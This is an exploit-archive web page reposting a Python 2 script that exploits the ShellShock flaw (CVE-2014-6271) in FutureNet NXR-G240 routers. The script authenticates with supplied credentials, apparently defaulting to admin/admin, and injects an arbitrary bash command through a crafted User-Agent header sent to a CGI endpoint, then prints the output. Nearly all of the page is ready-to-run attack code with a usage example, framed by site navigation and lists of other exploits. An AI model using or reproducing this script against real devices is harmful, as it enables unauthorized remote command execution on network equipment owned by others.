首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FutureNet NXR-G240 Series ShellShock Command Injection
来源:wassline at gmail.com 作者:Asrir 发布时间:2018-12-10  
# -*- coding: utf-8 -*-
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection
# Date: 2018-06-12
# Author: Nassim Asrir
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: http://www.centurysys.co.jp/
# CVE: CVE-2014-6271
# Greetz to : Nadia BENCHIKHA for the great help.
# Example:
# [root@parrot]a[/home/sniperpex/Desktop]
# #python ./exploit.py http://server -u admin -p admin -c ps

import urllib2
import base64
import bs4
import sys
import argparse
reload(sys)
sys.setdefaultencoding('utf8')

ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")

ap.add_argument("host", help="(Example: http://127.0.0.1).")

ap.add_argument("-u", "--user", help="Admin username (Default: admin)")

ap.add_argument("-p", "--password", help="Admin password (Default: admin)")

ap.add_argument("-c", "--cmd", help="Command to run.")

args = ap.parse_args()

request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")

base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')

print '[+] Authentication & Exploit in progress...'

request.add_header("Authorization", "Basic %s" % base64string)

request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))

response = urllib2.urlopen(request)

soup = bs4.BeautifulSoup(response, 'html.parser')

for textarea in soup.find_all('pre'):

    print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·i-doit CMDB 1.11.2 - Remote Co
·MiniShare 1.4.1 HEAD / POST Bu
·Textpad 8.1.2 - Denial Of Serv
·XNU POSIX Shared Memory Mappin
·HasanMWB 1.0 SQL Injection
·Google Chrome 70.0.3538.77 Cro
·NUUO NVRMini2 3.9.1 - Authenti
·CyberLink LabelPrint 2.5 Stack
·OpenSSH < 7.7 - User Enumerati
·WebKit JIT Proxy Object Issue
·Xorg X11 Server (AIX) - Local
·Linux userfaultfd tmpfs File P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved